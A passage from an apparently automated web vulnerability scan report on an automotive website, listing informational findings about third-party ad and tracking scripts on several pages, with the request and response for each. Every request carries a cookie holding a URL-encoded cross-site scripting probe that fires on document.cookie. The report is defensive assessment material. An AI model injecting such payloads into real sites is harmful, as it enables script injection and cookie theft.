  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43756
Expires: Mon, 24 Jan 2011 23:47:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:47 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
0CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=63939636?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=63939636?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=1x3;!cat=;ord=63939636?"></script>
...[SNIP]...
CCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=63939636?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=63939636?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.517. http://www.autobytel.com/car-blog.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-blog.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=728x90;ptile=1;!cat=;ord=30821774?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=160x600;ptile=2;!cat=;ord=30821774?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=1x3;!cat=;ord=30821774?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62043


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=728x90;ptile=1;!cat=;ord=30821774?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=728x90;ptile=1;!cat=;ord=30821774?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=1x3;!cat=;ord=30821774?"></script>
...[SNIP]...
1C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=160x600;ptile=2;!cat=;ord=30821774?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=160x600;ptile=2;!cat=;ord=30821774?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.518. http://www.autobytel.com/car-dealers.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=728x90;ptile=1;!cat=;ord=8791101?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=160x600;ptile=3;!cat=;ord=8791101?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=1x3;!cat=;ord=8791101?
  • http://ad.doubleclick.net/adj/abtl.research/fms;abr=!ie;kw=fms;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=300x250;ptile=2;!cat=;ord=8791101?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=728x90;ptile=1;!cat=;ord=8791101?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=728x90;ptile=1;!cat=;ord=8791101?"></SCRIPT>
...[SNIP]...
68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=300x250;ptile=2;!cat=;ord=8791101?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/fms;abr=!ie;kw=fms;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=300x250;ptile=2;!cat=;ord=8791101?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=1x3;!cat=;ord=8791101?"></script>
...[SNIP]...
4F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=160x600;ptile=3;!cat=;ord=8791101?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=160x600;ptile=3;!cat=;ord=8791101?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.519. http://www.autobytel.com/car-financing.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=728x90;ptile=1;!cat=;ord=44592567?
  • http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=160x600;ptile=2;!cat=;ord=44592567?
  • http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=1x3;!cat=;ord=44592567?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:46:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41426


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
91737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=728x90;ptile=1;!cat=;ord=44592567?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=728x90;ptile=1;!cat=;ord=44592567?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=1x3;!cat=;ord=44592567?"></script>
...[SNIP]...
737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=160x600;ptile=2;!cat=;ord=44592567?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||48391737-ED87-7911-30A1D0BABEA03901|||13148|||;sz=160x600;ptile=2;!cat=;ord=44592567?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.520. http://www.autobytel.com/car-incentives.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=728x90;ptile=1;!cat=;ord=22812529?
  • http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=160x600;ptile=2;!cat=;ord=22812529?
  • http://ad.doubleclick.net/adj/abtl.rebates/;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=1x3;!cat=;ord=22812529?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=any&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
89624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=728x90;ptile=1;!cat=;ord=22812529?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=728x90;ptile=1;!cat=;ord=22812529?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.rebates/;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=1x3;!cat=;ord=22812529?"></script>
...[SNIP]...
624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=160x600;ptile=2;!cat=;ord=22812529?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.rebates/;abr=!ie;kw=;info=13148;u=|||48289624-9C2C-5627-D498DD339EB3613D|||13148|||;sz=160x600;ptile=2;!cat=;ord=22812529?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=any&ins=no">
</SCRIPT>
...[SNIP]...

21.521. http://www.autobytel.com/car-news.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=728x90;ptile=1;!cat=;ord=31788896?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=160x600;ptile=2;!cat=;ord=31788896?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=1x3;!cat=;ord=31788896?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 40861
Expires: Mon, 24 Jan 2011 23:47:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:58 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=728x90;ptile=1;!cat=;ord=31788896?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=728x90;ptile=1;!cat=;ord=31788896?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=1x3;!cat=;ord=31788896?"></script>
...[SNIP]...
9B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=160x600;ptile=2;!cat=;ord=31788896?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484299B9-FE9B-4741-B0EB15773458BB23|||13148|||;sz=160x600;ptile=2;!cat=;ord=31788896?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.522. http://www.autobytel.com/car-pictures.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=728x90;ptile=1;!cat=;ord=46630777?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=160x600;ptile=3;!cat=;ord=46630777?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||482348ED-0FE3-85F9-DC91484DEC600C11|||13148|||;sz=300x250;ptile=2;!cat=;ord=46630777?
